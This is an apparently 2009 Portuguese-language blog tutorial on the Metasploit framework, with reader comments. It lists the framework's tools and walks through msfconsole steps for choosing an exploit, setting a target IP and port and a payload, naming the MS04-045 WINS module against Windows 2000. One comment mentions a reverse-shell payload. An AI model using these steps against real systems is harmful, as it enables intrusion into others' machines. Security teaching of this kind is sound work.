Metasploit,: exploits, payloads, targets, encoders, nops

Publicado: maio 6, 2009 em exploits, seguranca
Tags:, , , ,

Vim falar um pouco sobre o metasploit.
Metasploit e uma ferramenta que testa a segurança de sistemas. Metasploit é um framework que foi criado  por “H.D.Moore.
Ele possui centenas de exploits, payloads e ferramentas muito avançadas que nos permite testar vulnerabilidades em muitas plataformas, sistemas operacionais, sistemas e servidores.
Voce pode baixar o metasploit no proprio site do mesmo(http://www.metasploit.com.
O metasploit possui várias ferramentas dentre elas:

msfconsole – metasploit em modo console
msfcli – interface de automatização de penetração e exploração
msflogdump – exibe sessões de arquivos de log
msfplayload – usado para gerar payloads customizados
msfpescan – utilizado para analisar e descompilar executaveis e DLLs
msfencode – um codificador interativo de payload encoder
msfupdate – utilizado para verificar e fazer download de atualização do framework
msfweb – Interface grafica via browser

Irei explicar agora, um pouco mais sobre o metasploit na parte pratica.
Vou explicar usando linux, mais todas as versoes(independente do S.O).
Baixe o metasploit no link que já passei.
Depois de instalado.
Entre no console e digita na de comando:
./msfconsole
irá aparecer o console do metasploit
msf > show payloads    //verá todos payloads do metasploit
msf > show exploits    //verá todos exploits do metasploit
Si voce digitar somente
msf > show
msfconsole: show: requires an option: ‘exploits’, ‘payloads’, ‘encoders’, or ‘nops’
msf >
aparece as opçoes deste comando
Para usar um exploit basta digitar:
msf > Use exploit_desejado
msf exploits_desejado >
viram que eu escolhi o exploit_desejadoe o prompt mudou Smile?
Para verificar as opçoes este exploit aceita, digite:

msf exploit_desejado> show options

Exploit Options
===============

Exploit: Name Default Description
——– —— ——- ——————
required RHOST The target address
required RPORT 42 The target port

Target: Target Not Specified

msf exploit_desejado >

Este exploit aceita somente duas opcoes : o ip alvo e a porta alvo.
Para especificar o alvo, basta digitar:

msf exploit_desejado > set RHOST 189.155.165.22
RHOST -> 200.126.35.34
msf exploit_desejado >

agora vamos colocar a porta para o teste
 
msf exploit_desejado  > set RPORT 135
RPORT -> 135
msf exploit_desejado >
 

Agora teremos que definir um payload
O payload nada mais é q um software acoplado ao exploit para fazer as mais variadas tarefas.

msf exploit_desejado > set PAYLOAD PAYLOAD_desejado teste
PAYLOAD PAYLOAD_desejado -> teste
msf exploit_desejado >

Vamos agora listar os sistemas operacionais q serão os alvos: Utilizando o velho comando : show, só q agora assim: show targets

msf exploit_desejado  > show targets

Supported Exploit Targets
=========================

0 Windows 2000 English
Só temos uma opcao aqui, somente o windows 2000 em ingles é vulneravel, mas tudo bem…

msf exploit_desejado > set TARGET 0
TARGET -> 0
msf exploit_desejado  >

Pronto já definimos tudo que tinha que definir para o teste, agora só falta executarmos o teste.

Digite somente: exploit

msf wins_ms04_045 > exploit

voce acabou de si conectar ao COMPUTADOR alvo

comentários
  1. juancarloscunha disse:

    Alguma duvida, é só mandar, pois si eu poder ajudar, eu ajudarei com o maior prazer

  2. Ubuntu disse:

    cara nem consigo usar o exploit tipo num gera sessão

  3. Eudes disse:

    Olá fiz um scan no pc do meu amigo com ele sabendo logico ai o
    nmap acho a porta 135 aberta so que quando vo rodar o exploit nela
    não conecta porque?

  4. duduindo disse:

    Eu não entendi naquela:
    set PAYLOAD PAYLOAD_desejado teste

    O sistema que eu quero invadir é Win200 tb.(Está instalado no VirtualBox)

    Falow e ótimo Tuto ! 😉

  5. duduindo disse:

    Esqueçi a minha pergunta ai em cima…hehehe

    set PAYLOAD exploit_desejado… hehe

  6. MElqui disse:

    Assim, eu so estou usando o payload, sem exploit

    o payload ja esta na maquina do meu colega(ele sabe e claro) como eu me concto a ele! eu estou usando um payload de conexão reversa (windows/meterpreter/reverse_tcp)

    meu amigo me disse que e um comando que eu fico como se fosse em escuta, somente aguardando a conexão dele!

Deixe uma resposta

Preencha os seus dados abaixo ou clique em um ícone para log in:

Logotipo do WordPress.com

Você está comentando utilizando sua conta WordPress.com. Sair / Alterar )

Imagem do Twitter

Você está comentando utilizando sua conta Twitter. Sair / Alterar )

Foto do Facebook

Você está comentando utilizando sua conta Facebook. Sair / Alterar )

Foto do Google+

Você está comentando utilizando sua conta Google+. Sair / Alterar )

Conectando a %s